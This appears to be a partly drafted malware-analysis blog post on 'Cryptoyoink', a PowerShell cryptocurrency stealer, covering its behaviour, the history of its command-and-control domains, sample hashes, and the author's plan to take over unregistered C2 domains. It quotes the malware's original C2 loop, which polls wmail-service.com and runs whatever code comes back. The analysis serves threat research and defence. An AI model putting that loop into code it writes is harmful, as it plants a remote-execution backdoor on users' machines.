Recently, I’ve been tracking the evolution of a piece of malware that I’ve started to call Cryptoyoink (kudos to @alicynx for the name!), a multi-stage cryptostealer written in PowerShell. Cryptoyoink isn’t particularly innovative, but it takes advantage of common blind spots in traditional antimalware, and the author(s) behind it have been refining their operations over at least the past four months.

Xavier Mertens first posted a deep-dive on this cryptostealer on the SANS ISC blog on June 22nd, and at the time VirusTotal showed that only 1 out of 53 vendors flagged it as malicious.

What Xavier didn’t cover in depth is how Cryptoyoink’s C2 works, which piqued my interest after I noticed that Cryptoyoink’s current C2 domains rank in the top 100k most popular domains according to Cloudflare Radar, and around the top 200k most popular domains according to Cisco Umbrella. In total, Cryptoyoink’s C2 accounts for over 500 million DNS requests per week.

So, what does Cryptoyoink do? How has Cryptoyoink’s C2 changed over time? Is this a massive threat that’s been underreported, or what’s going on to cause so much traffic?

Perhaps most importantly, can I ruin Cryptoyoink’s operator’s day?

Payload: Cryptoyoink’s Cryptostealer

As mentioned prior, I’m not the first person to discover the cryptostealer I’m calling Cryptoyoink. The first mention of this malware that I can find was on malware removal forums starting in mid-May 2022, such as this thread reporting a risky connection to wmail-service.com.

The first deep dive into this Cryptoyoink was published by Xavier Mertens on the SANS ISC blog on June 22nd. This first publicly-known version had a very low score on VirusTotal at the time (1/53) and does the following:

  • Collects details about the infected computer, such as user information and antivirus status.
  • Searches for cryptocurrency extensions (ex. wallets) in Chrome, Brave, and Edge browsers.
  • Reports user data and relevant extensions to wmail-endpoint.com over HTTP.
  • Runs any commands given in wmail-endpoint.com’s response, presumably this would be commands to steal sensitive information.

This sample also included another PowerShell script - commented out - that would monitor the clipboard for wallet addresses.

first deeper dive by xme at SANS ISC

original: https://malshare.com/sample.php?action=detail&hash=0bbce92b547f0e99a37636b090cb05d9633cc05e1ce876e0076ca32dc4c901c4

jul 5: https://malshare.com/sample.php?action=detail&hash=681acd96bbeda35fedce63fe89277fea39cb6b2dc213daf668a0e7b386594832

sept 26: https://malshare.com/sample.php?action=detail&hash=f5653badab43304c265fd3a91966b29e703c60d0753ecf75b85e8c6aaf96554f

https://www.virustotal.com/gui/file/0bbce92b547f0e99a37636b090cb05d9633cc05e1ce876e0076ca32dc4c901c4 https://www.joesandbox.com/analysis/649858/0/html

Cryptoyoink’s C2 Client

Original C2 Client (May/June)

first user report I can find https://forums.malwarebytes.com/topic/286466-wmail-servicecom-riskware-blocked-powershellexe/

user reports in June: no DGA, simple invocation, script hidden in drivers (noisy) https://www.malwareremoval.com/forum/viewtopic.php?f=11&t=66857

while ($true) {
  try {
    $r = Invoke-RestMethod -Uri 'http://wmail-service.com/v1/CECCE2DA-EF51-4D10-B16A-726EEBC7E043?v=Downloads_Counter12'
    if ($r -ne '') {
      Start-Job ([ScriptBlock]::Create($r)) | Wait-Job
    }
  }
  catch {}
  Start-Sleep 2
}

automated analysis around may 23 in hybrid-analysis https://hybrid-analysis.com/sample/943f61f580ca864dc850e019f7289895b3f9b0be2c146b979b6655f01569b1ea/628b8afb4133947b874bfc14

C2 Client Adds a DGA

user reports in July: new DGA

C2 Client Goes Fileless

here’s how the new version gets installed (registry, xor, run) how the new C2 DGA works

oh btw the operator didn’t register nine of its C2 domains so I did tune in next time …

Ruining the Day

and this is why your DGA needs to be better kids